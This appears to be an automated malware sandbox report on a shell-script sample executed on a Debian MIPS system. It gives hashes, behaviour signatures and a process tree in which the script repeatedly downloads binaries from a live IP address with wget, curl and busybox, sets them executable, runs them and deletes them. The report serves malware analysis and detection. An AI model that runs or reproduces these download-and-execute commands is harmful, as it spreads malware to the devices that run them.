Analysis
-
max time kernel
149s -
max time network
155s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
18/10/2024, 02:59
Static task
static1
Behavioral task
behavioral1
Sample
e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh
-
Size
10KB
-
MD5
bd36c3851a123cb041ac845fb2a97f33
-
SHA1
276091f6814de9b87d827fb423a0a158a37cd4a1
-
SHA256
e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b
-
SHA512
ec36ea0baa72b2766fd4fdc90e029bb9421585299ce786b8d8d82f3ab5f0233385a8d06f9bfe0e65de636791cd75cd93617e8064c7343b4149e79aee2a1ed382
-
SSDEEP
192:Clp+dd0Rym0tDBRD+PDRJP1t6gFC2VymEDBRD+PDRJPG2a6Vlp+ddZ:U0lb+1tzF5sb+VaN
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 25 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 729 chmod 745 chmod 814 chmod 874 chmod 892 chmod 898 chmod 934 chmod 784 chmod 880 chmod 922 chmod 947 chmod 808 chmod 834 chmod 862 chmod 868 chmod 886 chmod 910 chmod 928 chmod 940 chmod 736 chmod 802 chmod 856 chmod 904 chmod 916 chmod 953 chmod -
Executes dropped EXE 25 IoCs
ioc pid Process /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX 730 jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr 737 9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu 746 VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr 786 rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ 803 MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g 809 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv 815 NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs 835 kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW 857 aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 863 Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q 869 YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC 875 iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 881 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a 887 Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr 893 rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ 899 MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g 905 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs 911 kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW 917 aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 923 Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv 929 NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC 935 iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 941 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a 948 Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q 954 YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 25 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g curl File opened for modification /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs curl File opened for modification /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 curl File opened for modification /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q curl File opened for modification /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX curl File opened for modification /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr curl File opened for modification /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ curl File opened for modification /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW curl File opened for modification /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q curl File opened for modification /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a curl File opened for modification /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW curl File opened for modification /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 curl File opened for modification /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu curl File opened for modification /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv curl File opened for modification /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs curl File opened for modification /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv curl File opened for modification /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 curl File opened for modification /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr curl File opened for modification /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC curl File opened for modification /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ curl File opened for modification /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g curl File opened for modification /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a curl File opened for modification /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr curl File opened for modification /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 curl File opened for modification /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC curl
Processes
-
/tmp/e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh/tmp/e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh1⤵PID:698
-
/bin/rm/bin/rm bins.sh2⤵PID:704
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵PID:707
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:714
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵PID:727
-
-
/bin/chmodchmod 777 jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵
- File and Directory Permissions Modification
PID:729
-
-
/tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX./jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵
- Executes dropped EXE
PID:730
-
-
/bin/rmrm jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵PID:731
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵PID:732
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:734
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵PID:735
-
-
/bin/chmodchmod 777 9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr./9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵
- Executes dropped EXE
PID:737
-
-
/bin/rmrm 9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵PID:738
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵PID:739
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵PID:741
-
-
/bin/chmodchmod 777 VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu./VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵PID:748
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵PID:750
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵PID:765
-
-
/bin/chmodchmod 777 rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵
- File and Directory Permissions Modification
PID:784
-
-
/tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr./rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵
- Executes dropped EXE
PID:786
-
-
/bin/rmrm rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵PID:791
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵PID:792
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵PID:801
-
-
/bin/chmodchmod 777 MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ./MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵
- Executes dropped EXE
PID:803
-
-
/bin/rmrm MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵PID:804
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵PID:805
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵PID:807
-
-
/bin/chmodchmod 777 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g./871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵
- Executes dropped EXE
PID:809
-
-
/bin/rmrm 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵PID:810
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵PID:811
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵PID:813
-
-
/bin/chmodchmod 777 NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv./NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵PID:816
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵PID:817
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:822
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵PID:831
-
-
/bin/chmodchmod 777 kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs./kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵
- Executes dropped EXE
PID:835
-
-
/bin/rmrm kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵PID:838
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵PID:839
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:844
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵PID:853
-
-
/bin/chmodchmod 777 aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW./aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵
- Executes dropped EXE
PID:857
-
-
/bin/rmrm aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵PID:858
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵PID:859
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:860
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵PID:861
-
-
/bin/chmodchmod 777 Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6./Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵
- Executes dropped EXE
PID:863
-
-
/bin/rmrm Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵PID:864
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵PID:865
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵PID:867
-
-
/bin/chmodchmod 777 YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q./YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵PID:870
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵PID:871
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵PID:873
-
-
/bin/chmodchmod 777 iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC./iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵PID:879
-
-
/bin/chmodchmod 777 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4./8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵PID:885
-
-
/bin/chmodchmod 777 Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a./Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵PID:891
-
-
/bin/chmodchmod 777 rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr./rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr2⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵PID:897
-
-
/bin/chmodchmod 777 MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ./MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ2⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵PID:903
-
-
/bin/chmodchmod 777 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g./871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g2⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵PID:909
-
-
/bin/chmodchmod 777 kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs./kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs2⤵PID:912
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵PID:913
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵PID:915
-
-
/bin/chmodchmod 777 aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW./aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW2⤵PID:918
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵PID:919
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵PID:921
-
-
/bin/chmodchmod 777 Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6./Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e62⤵PID:924
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵PID:925
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵PID:927
-
-
/bin/chmodchmod 777 NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv./NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵PID:930
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵PID:931
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵PID:933
-
-
/bin/chmodchmod 777 iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC./iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵
- Executes dropped EXE
PID:935
-
-
